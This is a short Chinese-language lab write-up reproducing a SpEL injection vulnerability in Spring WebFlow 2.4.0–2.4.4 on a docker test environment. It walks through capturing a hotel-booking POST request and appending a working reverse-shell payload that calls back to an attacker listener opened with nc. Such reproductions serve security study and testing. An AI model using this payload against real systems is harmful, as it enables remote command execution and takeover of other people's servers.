原理
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
影响版本
Spring WebFlow 2.4.0 - 2.4.4
漏洞复现
靶机Ubuntu:192.168.126.190
攻击机kali:192.168.126.129
启动docker环境
docker-compose up -d
访问页面【靶机IP+8080端口】
http://192.168.126.190:8080
可以看到一个酒店预订的页面
点击login,出现一些可用的账号密码,随意选择一组登录
登陆后,在输入框输入1,然后点击Find Hotels按钮
点击第一个View Hotel按钮,进入页面【也可以登录之后直接进入下面这个页面】
http://192.168.126.190:8080/hotels/1
点击预订按钮Book Hotel,填写相关信息后点击Proceed
打开BP,点击确认Confirm按钮时,抓包
抓到一个post数据包
在kali打开监听端口
nc -lvvp 6666
构造反弹shell的payload,放在请求包中【直接粘贴在原有数据后;改为靶机IP+监听端口】
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.126.129/6666+0>%261")).start()=vulhub
点击send放包
成功反弹shell,执行任意命令测试
whoami
复现完成
在靶机关闭docker容器
docker-compose down